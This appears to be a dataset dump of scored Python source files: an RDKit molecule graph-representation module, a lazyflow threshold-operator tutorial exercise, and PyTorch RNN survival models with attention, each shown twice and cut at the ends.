values = _normalize_adjacency_values(values, normalization)
return index, values, (2 * mol.GetNumBonds(), 2 * mol.GetNumBonds())
def bond_incidence_list_segment(mol):
""" Computes the bond-bond incidence list in segmented format. """
num_elements = mr_native.get_edge_incidence_size(mol)
scopes = np.empty((2 * mol.GetNumBonds(), 2), dtype=np.int32)
index = np.empty(num_elements, dtype=np.int32)
mr_native.fill_bond_incidence_list_segment(scopes, index, mol)
return scopes, index
def atom_leaves_index(mol):
return np.array(chemutils.get_atom_leaves(mol), dtype=np.int32)
def ring_leaves_index(mol):
""" Computes representation for ring leaves in molecules.
This function computes structures for ring leaf information. It is returned
as a tuple (and additional length information).
Each array of the tuple represents an atom in the molecule. The first array indicates
which leaf ring the atom belongs to, whereas the second array indicates the index
of the atom in the molecule.
"""
leaves = chemutils.get_ring_leaves(mol)
leaves = [np.array(x, dtype=np.int64) for x in leaves]
leaf_length = np.array([len(x) for x in leaves], dtype=np.int32)
idx_atom = np.concatenate([np.zeros([0], dtype=np.int64)] + leaves, axis=0)
idx_leaf = np.repeat(np.arange(len(leaves)), leaf_length)
idx = np.stack((idx_leaf, idx_atom))
values = np.repeat(np.reciprocal(np.sqrt(leaf_length.astype(np.float32)), where=leaf_length != 0), leaf_length)
shape = (len(leaves), mol.GetNumAtoms())
return (idx, values, shape), len(leaves)
def mol2graph_single(mol, include_leaves=False, include_rings=False, normalization='sum'):
""" Computes graph representation of given molecule.
Parameters
----------
mol: a `rdkit.Chem.Mol` representing the molecule for which to compute the representation
include_leaves: if True, also computes index informations for the leaves in the molecule.
include_rings: if True, also computes bond ring information for bonds belonging to rings.
normalization: the normalization to be used in aggregating bond messages.
Returns
-------
A ordered dictionary of 4 numpy tensors.
feature_atoms: a 2-d floating point array representing the feature embedding for each atom.
feature_bonds: a 2-d floating point array representing the features embedding for each bond.
atom_incidence: a 2-d integer array representing the incidence between each atom and bond.
bond_incidence: a 2-d integer array representing the incidence between bonds.
"""
num_atoms = mol.GetNumAtoms()
num_bonds = mol.GetNumBonds()
fatoms = np.zeros((num_atoms, ATOM_FDIM), dtype=np.float32)
fbonds = np.zeros((2 * num_bonds, ATOM_FDIM + BOND_FDIM), dtype=np.float32)
mr_native.fill_atom_features(fatoms, mol)
mr_native.fill_bond_features(fbonds, mol)
agraph = atom_bond_list(mol, normalization=normalization)
bgraph = bond_incidence_list(mol, normalization=normalization)
result = [
('atom_feature', fatoms),
('bond_feature', fbonds),
('atom_incidence', agraph),
('bond_incidence', bgraph)]
count = {
'atom': num_atoms,
'bond': num_bonds
}
if include_leaves:
ring_leaf_idx, num_ring_leaves = ring_leaves_index(mol)
result.append(('leaf_ring', ring_leaf_idx))
count['leaf_ring'] = num_ring_leaves
atom_leaf_idx = atom_leaves_index(mol)
result.append(('leaf_atom', atom_leaf_idx))
count['leaf_atom'] = len(atom_leaf_idx)
if include_rings:
ring_bond_idx, ring_bond_order = ring_info(mol)
result.append(('ring_bond_idx', ring_bond_idx))
result.append(('ring_bond_order', ring_bond_order))
count['ring'] = len(ring_bond_idx)
result.append(('count', count))
return OrderedDict(result) | code/genric/molecule_representation/_representation.py |
from collections import OrderedDict
import numpy as np
from .. import Chem, chemutils
from ..vocabulary import AtomTuple
try:
from ..genric_extensions import molecule_representation as mr_native
except ImportError:
from . import _implementation_python as mr_native
from ._implementation_python import atom_features, bond_features, ELEM_LIST, ATOM_FDIM, BOND_FDIM
MAX_NB = 6
def ring_info(mol):
ring_bond_idx = []
ring_bond_order = []
num_bonds = 0
for i, bond in enumerate(mol.GetBonds()):
if not bond.IsInRing():
continue
num_bonds += 1
bond_order = int(AtomTuple.from_atom(bond.GetBeginAtom()) < AtomTuple.from_atom(bond.GetEndAtom()))
ring_bond_idx.append(2 * i)
ring_bond_idx.append(2 * i + 1)
ring_bond_order.append(bond_order)
ring_bond_order.append(1 - bond_order)
return np.array(ring_bond_idx, dtype=np.int32), np.array(ring_bond_order, dtype=np.int32)
def _normalize_adjacency_values(values, normalization):
if normalization == 'sum':
return np.ones_like(values)
elif normalization == 'sqrt':
return values
elif normalization == 'mean':
return np.square(values, out=values)
else:
raise ValueError("Unknown normalization type {0}".format(normalization))
def atom_bond_list(mol, normalization='sum'):
""" Computes the atom-bond incidence list.
This method computes the atom-bond incidence list.
For each atom (row), the bonds it belongs to are enumerated, and recorded
in the ith column as an index.
Parameters
----------
mol: a rdkit molecule for which to compute the list.
normalization: 'sum', 'mean' or 'sqrt'. The normalization to apply.
Returns
-------
Elements with represent a sparse matrix in COO format.
"""
index = np.empty((2, 2 * mol.GetNumBonds()), dtype=np.int32)
values = np.empty(2 * mol.GetNumBonds(), dtype=np.float32)
mr_native.fill_atom_bond_list_sparse(values, index, mol)
values = _normalize_adjacency_values(values, normalization)
return index, values, (mol.GetNumAtoms(), 2 * mol.GetNumBonds())
def atom_bond_list_segment(mol):
""" Computes the atom-bond incidence list in segmented form.
This function returns the atom-bond list in segmented format.
Parameters
----------
mol: a rdkit molecule for which to compute the list.
"""
scopes = np.empty((mol.GetNumAtoms(), 2), dtype=np.int32)
index = np.empty(2 * mol.GetNumBonds(), dtype=np.int32)
mr_native.fill_atom_bond_list_segment(scopes, index, mol)
return scopes, index
def bond_incidence_list(mol, normalization='sum'):
""" Computes the bond-bond incidence list.
This method computes the bond-bond incidence list.
For each ordered bond (row), the (ordered) bonds with which it shares
an atom are enumerated, and are recorded in the ith column as a bond index.
When recording incident bonds, only incoming bonds are recorded (that is, the
orientation of the bond is such that the second atom is shared with the bond
being considered).
Parameters
----------
mol: a rdkit molecule for which to compute the list.
normalization: 'sum', 'mean' or 'sqrt'. The normalization to apply.
Returns
-------
a 2-d numpy array representing the given list. It has length 2 * num_bonds + 1.
"""
num_elements = mr_native.get_edge_incidence_size(mol)
index = np.empty((2, num_elements), dtype=np.int32)
values = np.empty(num_elements, dtype=np.float32)
mr_native.fill_bond_incidence_list_sparse(values, index, mol)
values = _normalize_adjacency_values(values, normalization)
return index, values, (2 * mol.GetNumBonds(), 2 * mol.GetNumBonds())
def bond_incidence_list_segment(mol):
""" Computes the bond-bond incidence list in segmented format. """
num_elements = mr_native.get_edge_incidence_size(mol)
scopes = np.empty((2 * mol.GetNumBonds(), 2), dtype=np.int32)
index = np.empty(num_elements, dtype=np.int32)
mr_native.fill_bond_incidence_list_segment(scopes, index, mol)
return scopes, index
def atom_leaves_index(mol):
return np.array(chemutils.get_atom_leaves(mol), dtype=np.int32)
def ring_leaves_index(mol):
""" Computes representation for ring leaves in molecules.
This function computes structures for ring leaf information. It is returned
as a tuple (and additional length information).
Each array of the tuple represents an atom in the molecule. The first array indicates
which leaf ring the atom belongs to, whereas the second array indicates the index
of the atom in the molecule.
"""
leaves = chemutils.get_ring_leaves(mol)
leaves = [np.array(x, dtype=np.int64) for x in leaves]
leaf_length = np.array([len(x) for x in leaves], dtype=np.int32)
idx_atom = np.concatenate([np.zeros([0], dtype=np.int64)] + leaves, axis=0)
idx_leaf = np.repeat(np.arange(len(leaves)), leaf_length)
idx = np.stack((idx_leaf, idx_atom))
values = np.repeat(np.reciprocal(np.sqrt(leaf_length.astype(np.float32)), where=leaf_length != 0), leaf_length)
shape = (len(leaves), mol.GetNumAtoms())
return (idx, values, shape), len(leaves)
def mol2graph_single(mol, include_leaves=False, include_rings=False, normalization='sum'):
""" Computes graph representation of given molecule.
Parameters
----------
mol: a `rdkit.Chem.Mol` representing the molecule for which to compute the representation
include_leaves: if True, also computes index informations for the leaves in the molecule.
include_rings: if True, also computes bond ring information for bonds belonging to rings.
normalization: the normalization to be used in aggregating bond messages.
Returns
-------
A ordered dictionary of 4 numpy tensors.
feature_atoms: a 2-d floating point array representing the feature embedding for each atom.
feature_bonds: a 2-d floating point array representing the features embedding for each bond.
atom_incidence: a 2-d integer array representing the incidence between each atom and bond.
bond_incidence: a 2-d integer array representing the incidence between bonds.
"""
num_atoms = mol.GetNumAtoms()
num_bonds = mol.GetNumBonds()
fatoms = np.zeros((num_atoms, ATOM_FDIM), dtype=np.float32)
fbonds = np.zeros((2 * num_bonds, ATOM_FDIM + BOND_FDIM), dtype=np.float32)
mr_native.fill_atom_features(fatoms, mol)
mr_native.fill_bond_features(fbonds, mol)
agraph = atom_bond_list(mol, normalization=normalization)
bgraph = bond_incidence_list(mol, normalization=normalization)
result = [
('atom_feature', fatoms),
('bond_feature', fbonds),
('atom_incidence', agraph),
('bond_incidence', bgraph)]
count = {
'atom': num_atoms,
'bond': num_bonds
}
if include_leaves:
ring_leaf_idx, num_ring_leaves = ring_leaves_index(mol)
result.append(('leaf_ring', ring_leaf_idx))
count['leaf_ring'] = num_ring_leaves
atom_leaf_idx = atom_leaves_index(mol)
result.append(('leaf_atom', atom_leaf_idx))
count['leaf_atom'] = len(atom_leaf_idx)
if include_rings:
ring_bond_idx, ring_bond_order = ring_info(mol)
result.append(('ring_bond_idx', ring_bond_idx))
result.append(('ring_bond_order', ring_bond_order))
count['ring'] = len(ring_bond_idx)
result.append(('count', count))
return OrderedDict(result) | 0.874493 | 0.582254 |
from lazyflow.operators import OpArrayPiper
"""
Operator classes usually start with "Op". We want to get started
quickly, so we just inherit from OpArrayPiper because the operator is
(at least to some extent) similar.
"""
class OpThreshold(OpArrayPiper):
# it is always good to give operators a name
name = "OpThreshold_First_Try"
# we will replace the hard-coded value in a later version of this
# operator
_threshold = 0.5
"""
We override the execute method of OpArrayPiper. Execute is called
whenever an OutputSlot of this operator is called (except when the
OutputSlot is connected to some other slot).
Let's take a look at the arguments:
slot This is the slot object from which data was requested
(in our case self.Output, because that's the only one
we have). If we had multiple OutputSlots we could use
it to distinguish between our operation modes. For
now, we ignore it.
subindex Another one for the ignore list. This is used for
higher level slots, more about them later.
roi The region of interest that was requested. For slots
that handle arrays, this is a lazyflow.rtype.SubRegion
object. We can use this to request data from upstream.
result This is a preallocated numpy array which we fill with
our computation results. Its shape fits the region
described by 'roi'.
"""
def execute(self, slot, subindex, roi, result):
"""
So, what was it that we wanted to do? Right, threshold the data.
We need to things for this.
1. threshold value
"""
threshold = self._threshold
"""
2. upstream data
In the last exercise, we requested data using the slicing
syntax:
data = self.Input[x_1:x:2, y_1:y_2].wait()
We could do this here, too, but we would have to extract a
slicing from the roi object. However, we are lucky and there is
an alternative method for creating requests that takes our roi
object.
"""
upstream_data = self.Input.get(roi).wait()
assert upstream_data.shape == result.shape
"""
Notice that Slot.get() also constructs a request, which we have
to wait for. Now that we have the data and the threshold value,
we can start our work.
"""
"""
EXERCISE:
Apply the threshold to upstream_data such that all values
strictly less than the threshold are set to 0 and all values
greater or equal to the threshold are set to 1. Store the
result in array result.
Hint: Don't overwrite the result array (result = my_new_array)
but fill it (result[:] = my_new_array).
"""
# ____________________
"""
We don't have to return a value (in fact, we shouldn't), filling
result is enough.
"""
"""
Ok, ready to test your implementation?
"""
import numpy
from lazyflow.graph import Graph
input_array = numpy.asarray([[.20, .60, .30],
[.10, .55, .99]])
expected_output_array = numpy.asarray([[0.0, 1.0, 0.0],
[0.0, 1.0, 1.0]])
op = OpThreshold(graph=Graph())
op.Input.setValue(input_array)
"""
Test whether requesting the whole array works ...
"""
output_array = op.Output[...].wait()
numpy.testing.assert_array_equal(output_array, expected_output_array)
"""
Test whether requesting a slice works ... Why do we need the squeeze()?
Hint: see last exercise.
"""
output_slice = op.Output[0, :].wait().squeeze()
expected_output_slice = expected_output_array[0, :]
numpy.testing.assert_array_equal(output_slice, expected_output_slice)
"""
That was not too hard. However, we used a fair amount of existent code,
which limits us in some ways.
"""
assert output_array.dtype == input_array.dtype
"""
Wouldn't it be nice if the output was a bool array rather than float64?
We will accomplish that in the next exercise.
""" | exercises/03/my_first_operator.py | from lazyflow.operators import OpArrayPiper
"""
Operator classes usually start with "Op". We want to get started
quickly, so we just inherit from OpArrayPiper because the operator is
(at least to some extent) similar.
"""
class OpThreshold(OpArrayPiper):
# it is always good to give operators a name
name = "OpThreshold_First_Try"
# we will replace the hard-coded value in a later version of this
# operator
_threshold = 0.5
"""
We override the execute method of OpArrayPiper. Execute is called
whenever an OutputSlot of this operator is called (except when the
OutputSlot is connected to some other slot).
Let's take a look at the arguments:
slot This is the slot object from which data was requested
(in our case self.Output, because that's the only one
we have). If we had multiple OutputSlots we could use
it to distinguish between our operation modes. For
now, we ignore it.
subindex Another one for the ignore list. This is used for
higher level slots, more about them later.
roi The region of interest that was requested. For slots
that handle arrays, this is a lazyflow.rtype.SubRegion
object. We can use this to request data from upstream.
result This is a preallocated numpy array which we fill with
our computation results. Its shape fits the region
described by 'roi'.
"""
def execute(self, slot, subindex, roi, result):
"""
So, what was it that we wanted to do? Right, threshold the data.
We need to things for this.
1. threshold value
"""
threshold = self._threshold
"""
2. upstream data
In the last exercise, we requested data using the slicing
syntax:
data = self.Input[x_1:x:2, y_1:y_2].wait()
We could do this here, too, but we would have to extract a
slicing from the roi object. However, we are lucky and there is
an alternative method for creating requests that takes our roi
object.
"""
upstream_data = self.Input.get(roi).wait()
assert upstream_data.shape == result.shape
"""
Notice that Slot.get() also constructs a request, which we have
to wait for. Now that we have the data and the threshold value,
we can start our work.
"""
"""
EXERCISE:
Apply the threshold to upstream_data such that all values
strictly less than the threshold are set to 0 and all values
greater or equal to the threshold are set to 1. Store the
result in array result.
Hint: Don't overwrite the result array (result = my_new_array)
but fill it (result[:] = my_new_array).
"""
# ____________________
"""
We don't have to return a value (in fact, we shouldn't), filling
result is enough.
"""
"""
Ok, ready to test your implementation?
"""
import numpy
from lazyflow.graph import Graph
input_array = numpy.asarray([[.20, .60, .30],
[.10, .55, .99]])
expected_output_array = numpy.asarray([[0.0, 1.0, 0.0],
[0.0, 1.0, 1.0]])
op = OpThreshold(graph=Graph())
op.Input.setValue(input_array)
"""
Test whether requesting the whole array works ...
"""
output_array = op.Output[...].wait()
numpy.testing.assert_array_equal(output_array, expected_output_array)
"""
Test whether requesting a slice works ... Why do we need the squeeze()?
Hint: see last exercise.
"""
output_slice = op.Output[0, :].wait().squeeze()
expected_output_slice = expected_output_array[0, :]
numpy.testing.assert_array_equal(output_slice, expected_output_slice)
"""
That was not too hard. However, we used a fair amount of existent code,
which limits us in some ways.
"""
assert output_array.dtype == input_array.dtype
"""
Wouldn't it be nice if the output was a bool array rather than float64?
We will accomplish that in the next exercise.
""" | 0.761095 | 0.754712 |
import numpy as np
import math
import pandas as pd
import pickle as pkl
import torch
import torch.utils.data as utils
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import LSTM, GRU, ConstantPad1d
from tqdm import tqdm
from attention_models import Attention
from pdb import set_trace as bp
def flip_batch(x, seq_length):
assert x.shape[0] == seq_length.shape[0], 'Dimension Mismatch!'
for i in range(x.shape[0]):
x[i, :seq_length[i]] = x[i, :seq_length[i]].flip(dims=[0])
return x
class NetRNN(nn.Module):
def __init__(self, num_input, num_embeddings, hp):
super().__init__()
# Parameters ######################################################################################################################
self.nonprop_hazards = hp.nonprop_hazards
self.add_diagt = hp.add_diagt
self.add_month = hp.add_month
self.num_months_hx = hp.num_months_hx-1
self.rnn_type = hp.rnn_type
self.num_rnn_layers = hp.num_rnn_layers
self.embedding_dim = hp.embedding_dim
self.summarize = hp.summarize
# Embedding layers ################################################################################################################
self.embed_codes = nn.Embedding(num_embeddings = num_embeddings, embedding_dim = hp.embedding_dim, padding_idx = 0)
if self.add_month == 'embedding':
self.embed_month = nn.Embedding(num_embeddings = hp.num_months_hx, embedding_dim = hp.embedding_dim, padding_idx = 0)
if self.add_diagt:
self.embed_diagt = nn.Embedding(num_embeddings = 5, embedding_dim = hp.embedding_dim, padding_idx = 0)
# RNN #############################################################################################################################
if self.add_month == 'concat':
self.embedding_dim = self.embedding_dim + 1
self.pad_fw = ConstantPad1d((1, 0), 0.)
self.pad_bw = ConstantPad1d((0, 1), 0.)
if self.rnn_type == 'LSTM':
self.rnn_fw = LSTM(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
self.rnn_bw = LSTM(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
else:
self.rnn_fw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
self.rnn_bw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
if self.summarize == 'output_attention':
self.attention_fw = Attention(embedding_dim = self.embedding_dim)
self.attention_bw = Attention(embedding_dim = self.embedding_dim)
# Fully connected layers ##########################################################################################################
fc_size = num_input + 2*self.embedding_dim
layers = []
for i in range(hp.num_mlp_layers):
layers.append(nn.Linear(fc_size, fc_size))
layers.append(nn.ELU())
layers.append(nn.Linear(fc_size, 1))
self.mlp = nn.Sequential(*layers)
def forward(self, x, code, month, diagt, time=None, seq_length=None):
if self.nonprop_hazards and (time is not None):
x = torch.cat((x, time), dim=-1)
if seq_length is None:
seq_length = (code>0).sum(dim=-1)
# Embedding layers ################################################################################################################
embedded = self.embed_codes(code.long())
if self.add_diagt:
embedded = embedded + self.embed_diagt(diagt.long())
if self.add_month == 'embedding':
embedded = embedded + self.embed_month(month.long())
if self.add_month == 'concat':
month = month/float(self.num_months_hx)
delta = torch.clamp(month[:,1:]-month[:,:-1], min=0)
delta_fw = self.pad_fw(delta)
delta_bw = self.pad_bw(delta)
embedded_fw = torch.cat((embedded, delta_fw.unsqueeze(dim=-1)), dim=-1)
embedded_bw = torch.cat((embedded, delta_bw.unsqueeze(dim=-1)), dim=-1)
embedded_bw = flip_batch(embedded_bw, seq_length)
else:
embedded_fw = embedded
embedded_bw = flip_batch(embedded, seq_length)
# RNN #############################################################################################################################
packed_fw = nn.utils.rnn.pack_padded_sequence(embedded_fw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
packed_bw = nn.utils.rnn.pack_padded_sequence(embedded_bw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
if self.rnn_type == 'LSTM':
output_fw, (hidden_fw, _) = self.rnn_fw(packed_fw)
output_bw, (hidden_bw, _) = self.rnn_bw(packed_bw)
elif self.rnn_type == 'GRU':
output_fw, hidden_fw = self.rnn_fw(packed_fw)
output_bw, hidden_bw = self.rnn_bw(packed_bw)
if self.summarize == 'hidden':
hidden_fw = hidden_fw[-1] # view(num_layers, num_directions=1, batch, hidden_size)[last_state]
hidden_bw = hidden_bw[-1] # view(num_layers, num_directions=1, batch, hidden_size)[last_state]
summary_0, summary_1 = hidden_fw, hidden_bw
else:
output_fw, _ = nn.utils.rnn.pad_packed_sequence(output_fw, batch_first=True)
output_bw, _ = nn.utils.rnn.pad_packed_sequence(output_bw, batch_first=True)
output_fw = output_fw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
output_bw = output_bw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
if self.summarize == 'output_max':
output_fw, _ = output_fw.max(dim=1)
output_bw, _ = output_bw.max(dim=1)
summary_0, summary_1 = output_fw, output_bw
elif self.summarize == 'output_sum':
output_fw = output_fw.sum(dim=1)
output_bw = output_bw.sum(dim=1)
summary_0, summary_1 = output_fw, output_bw
elif self.summarize == 'output_avg':
output_fw = output_fw.sum(dim=1)/(seq_length.clamp(min=1).view(-1, 1))
output_bw = output_bw.sum(dim=1)/(seq_length.clamp(min=1).view(-1, 1))
summary_0, summary_1 = output_fw, output_bw
elif self.summarize == 'output_attention':
mask = (code>0)[:, :max(1, seq_length.max())]
summary_0, _ = self.attention_fw(output_fw, mask)
summary_1, _ = self.attention_bw(output_bw, mask)
# Fully connected layers ##########################################################################################################
x = torch.cat((x, summary_0, summary_1), dim=-1)
x = self.mlp(x)
return x
class NetRNNFinal(nn.Module):
def __init__(self, num_input, num_embeddings, hp):
super().__init__()
# Parameters ######################################################################################################################
self.num_months_hx = hp.num_months_hx-1
self.num_rnn_layers = hp.num_rnn_layers
self.embedding_dim = hp.embedding_dim
# Embedding layers ################################################################################################################
self.embed_codes = nn.Embedding(num_embeddings = num_embeddings, embedding_dim = hp.embedding_dim, padding_idx = 0)
self.embed_diagt = nn.Embedding(num_embeddings = 5, embedding_dim = hp.embedding_dim, padding_idx = 0)
# RNN #############################################################################################################################
self.embedding_dim = self.embedding_dim + 1
self.pad_fw = ConstantPad1d((1, 0), 0.)
self.rnn_fw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
self.attention_fw = Attention(embedding_dim = self.embedding_dim)
# Fully connected layers ##########################################################################################################
fc_size = num_input + self.embedding_dim
layers = []
layers.append(nn.Linear(fc_size, fc_size))
layers.append(nn.ELU())
layers.append(nn.Linear(fc_size, 1))
self.mlp = nn.Sequential(*layers)
def forward(self, x, code, month, diagt, time=None, seq_length=None):
if seq_length is None:
seq_length = (code>0).sum(dim=-1)
# Embedding layers ################################################################################################################
embedded = self.embed_codes(code.long())
embedded = embedded + self.embed_diagt(diagt.long())
month = month/float(self.num_months_hx)
delta = torch.clamp(month[:,1:]-month[:,:-1], min=0)
delta_fw = self.pad_fw(delta)
embedded_fw = torch.cat((embedded, delta_fw.unsqueeze(dim=-1)), dim=-1)
# RNN #############################################################################################################################
packed_fw = nn.utils.rnn.pack_padded_sequence(embedded_fw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
output_fw, _ = self.rnn_fw(packed_fw)
output_fw, _ = nn.utils.rnn.pad_packed_sequence(output_fw, batch_first=True)
output_fw = output_fw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
mask = (code>0)[:, :max(1, seq_length.max())]
summary_0, _ = self.attention_fw(output_fw, mask)
# Fully connected layers ##########################################################################################################
x = torch.cat((x, summary_0), dim=-1)
x = self.mlp(x)
return x | code/lib/rnn_models.py | import numpy as np
import math
import pandas as pd
import pickle as pkl
import torch
import torch.utils.data as utils
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import LSTM, GRU, ConstantPad1d
from tqdm import tqdm
from attention_models import Attention
from pdb import set_trace as bp
def flip_batch(x, seq_length):
assert x.shape[0] == seq_length.shape[0], 'Dimension Mismatch!'
for i in range(x.shape[0]):
x[i, :seq_length[i]] = x[i, :seq_length[i]].flip(dims=[0])
return x
class NetRNN(nn.Module):
def __init__(self, num_input, num_embeddings, hp):
super().__init__()
# Parameters ######################################################################################################################
self.nonprop_hazards = hp.nonprop_hazards
self.add_diagt = hp.add_diagt
self.add_month = hp.add_month
self.num_months_hx = hp.num_months_hx-1
self.rnn_type = hp.rnn_type
self.num_rnn_layers = hp.num_rnn_layers
self.embedding_dim = hp.embedding_dim
self.summarize = hp.summarize
# Embedding layers ################################################################################################################
self.embed_codes = nn.Embedding(num_embeddings = num_embeddings, embedding_dim = hp.embedding_dim, padding_idx = 0)
if self.add_month == 'embedding':
self.embed_month = nn.Embedding(num_embeddings = hp.num_months_hx, embedding_dim = hp.embedding_dim, padding_idx = 0)
if self.add_diagt:
self.embed_diagt = nn.Embedding(num_embeddings = 5, embedding_dim = hp.embedding_dim, padding_idx = 0)
# RNN #############################################################################################################################
if self.add_month == 'concat':
self.embedding_dim = self.embedding_dim + 1
self.pad_fw = ConstantPad1d((1, 0), 0.)
self.pad_bw = ConstantPad1d((0, 1), 0.)
if self.rnn_type == 'LSTM':
self.rnn_fw = LSTM(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
self.rnn_bw = LSTM(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
else:
self.rnn_fw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
self.rnn_bw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
if self.summarize == 'output_attention':
self.attention_fw = Attention(embedding_dim = self.embedding_dim)
self.attention_bw = Attention(embedding_dim = self.embedding_dim)
# Fully connected layers ##########################################################################################################
fc_size = num_input + 2*self.embedding_dim
layers = []
for i in range(hp.num_mlp_layers):
layers.append(nn.Linear(fc_size, fc_size))
layers.append(nn.ELU())
layers.append(nn.Linear(fc_size, 1))
self.mlp = nn.Sequential(*layers)
def forward(self, x, code, month, diagt, time=None, seq_length=None):
if self.nonprop_hazards and (time is not None):
x = torch.cat((x, time), dim=-1)
if seq_length is None:
seq_length = (code>0).sum(dim=-1)
# Embedding layers ################################################################################################################
embedded = self.embed_codes(code.long())
if self.add_diagt:
embedded = embedded + self.embed_diagt(diagt.long())
if self.add_month == 'embedding':
embedded = embedded + self.embed_month(month.long())
if self.add_month == 'concat':
month = month/float(self.num_months_hx)
delta = torch.clamp(month[:,1:]-month[:,:-1], min=0)
delta_fw = self.pad_fw(delta)
delta_bw = self.pad_bw(delta)
embedded_fw = torch.cat((embedded, delta_fw.unsqueeze(dim=-1)), dim=-1)
embedded_bw = torch.cat((embedded, delta_bw.unsqueeze(dim=-1)), dim=-1)
embedded_bw = flip_batch(embedded_bw, seq_length)
else:
embedded_fw = embedded
embedded_bw = flip_batch(embedded, seq_length)
# RNN #############################################################################################################################
packed_fw = nn.utils.rnn.pack_padded_sequence(embedded_fw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
packed_bw = nn.utils.rnn.pack_padded_sequence(embedded_bw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
if self.rnn_type == 'LSTM':
output_fw, (hidden_fw, _) = self.rnn_fw(packed_fw)
output_bw, (hidden_bw, _) = self.rnn_bw(packed_bw)
elif self.rnn_type == 'GRU':
output_fw, hidden_fw = self.rnn_fw(packed_fw)
output_bw, hidden_bw = self.rnn_bw(packed_bw)
if self.summarize == 'hidden':
hidden_fw = hidden_fw[-1] # view(num_layers, num_directions=1, batch, hidden_size)[last_state]
hidden_bw = hidden_bw[-1] # view(num_layers, num_directions=1, batch, hidden_size)[last_state]
summary_0, summary_1 = hidden_fw, hidden_bw
else:
output_fw, _ = nn.utils.rnn.pad_packed_sequence(output_fw, batch_first=True)
output_bw, _ = nn.utils.rnn.pad_packed_sequence(output_bw, batch_first=True)
output_fw = output_fw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
output_bw = output_bw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
if self.summarize == 'output_max':
output_fw, _ = output_fw.max(dim=1)
output_bw, _ = output_bw.max(dim=1)
summary_0, summary_1 = output_fw, output_bw
elif self.summarize == 'output_sum':
output_fw = output_fw.sum(dim=1)
output_bw = output_bw.sum(dim=1)
summary_0, summary_1 = output_fw, output_bw
elif self.summarize == 'output_avg':
output_fw = output_fw.sum(dim=1)/(seq_length.clamp(min=1).view(-1, 1))
output_bw = output_bw.sum(dim=1)/(seq_length.clamp(min=1).view(-1, 1))
summary_0, summary_1 = output_fw, output_bw
elif self.summarize == 'output_attention':
mask = (code>0)[:, :max(1, seq_length.max())]
summary_0, _ = self.attention_fw(output_fw, mask)
summary_1, _ = self.attention_bw(output_bw, mask)
# Fully connected layers ##########################################################################################################
x = torch.cat((x, summary_0, summary_1), dim=-1)
x = self.mlp(x)
return x
class NetRNNFinal(nn.Module):
def __init__(self, num_input, num_embeddings, hp):
super().__init__()
# Parameters ######################################################################################################################
self.num_months_hx = hp.num_months_hx-1
self.num_rnn_layers = hp.num_rnn_layers
self.embedding_dim = hp.embedding_dim
# Embedding layers ################################################################################################################
self.embed_codes = nn.Embedding(num_embeddings = num_embeddings, embedding_dim = hp.embedding_dim, padding_idx = 0)
self.embed_diagt = nn.Embedding(num_embeddings = 5, embedding_dim = hp.embedding_dim, padding_idx = 0)
# RNN #############################################################################################################################
self.embedding_dim = self.embedding_dim + 1
self.pad_fw = ConstantPad1d((1, 0), 0.)
self.rnn_fw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
self.attention_fw = Attention(embedding_dim = self.embedding_dim)
# Fully connected layers ##########################################################################################################
fc_size = num_input + self.embedding_dim
layers = []
layers.append(nn.Linear(fc_size, fc_size))
layers.append(nn.ELU())
layers.append(nn.Linear(fc_size, 1))
self.mlp = nn.Sequential(*layers)
def forward(self, x, code, month, diagt, time=None, seq_length=None):
if seq_length is None:
seq_length = (code>0).sum(dim=-1)
# Embedding layers ################################################################################################################
embedded = self.embed_codes(code.long())
embedded = embedded + self.embed_diagt(diagt.long())
month = month/float(self.num_months_hx)
delta = torch.clamp(month[:,1:]-month[:,:-1], min=0)
delta_fw = self.pad_fw(delta)
embedded_fw = torch.cat((embedded, delta_fw.unsqueeze(dim=-1)), dim=-1)
# RNN #############################################################################################################################
packed_fw = nn.utils.rnn.pack_padded_sequence(embedded_fw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
output_fw, _ = self.rnn_fw(packed_fw)
output_fw, _ = nn.utils.rnn.pad_packed_sequence(output_fw, batch_first=True)
output_fw = output_fw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
mask = (code>0)[:, :max(1, seq_length.max())]
summary_0, _ = self.attention_fw(output_fw, mask)
# Fully connected layers ##########################################################################################################
x = torch.cat((x, summary_0), dim=-1)
